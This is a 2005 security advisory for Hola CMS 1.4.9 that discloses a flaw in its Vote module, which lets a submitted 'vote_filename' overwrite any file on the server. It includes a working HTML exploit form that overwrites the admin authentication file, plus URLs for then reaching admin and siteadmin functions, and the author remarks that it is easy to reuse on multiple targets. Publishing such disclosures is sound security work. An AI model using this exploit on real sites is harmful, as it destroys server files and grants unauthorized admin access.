<<< Date Index >>>     <<< Thread Index >>>

Virginity Security Advisory 2005-001 : Hola CMS - File destruction and System access





- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
             DATE : 2005-03-12 15:45 GMT
             TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (http://holacms.drunkencat.net/)
           AUTHOR : Virginity
  ADVISORY NUMBER : 003
- - - --------------------------------------------------------------------


Description:

I found a serious security hole in Hola CMS:
The Vote-Module doesn't check wether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipluate or destroy 
system files
- not only the ones in the CMS but every file on the whole server!!!
Below i will show an example how to destroy login-authentification file and 
gaining access
to admin-functions!

Author of the Software has been notified.

- - - --------------------------------------------------------------------


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1"; method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!

But thats just for that lame CMS... of course you could attack operating-system 
files
or do other funny things. NO! Please don't do it! Just test on your own system 
:P
- - - --------------------------------------------------------------------


Solution:

Author wasn't nice last time so no more help for this piece of vuln software.
But i strongly reccomend you to use some other software since there are
still many other vulns in it!

- - - --------------------------------------------------------------------


Personal note:

So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!

- - - --------------------------------------------------------------------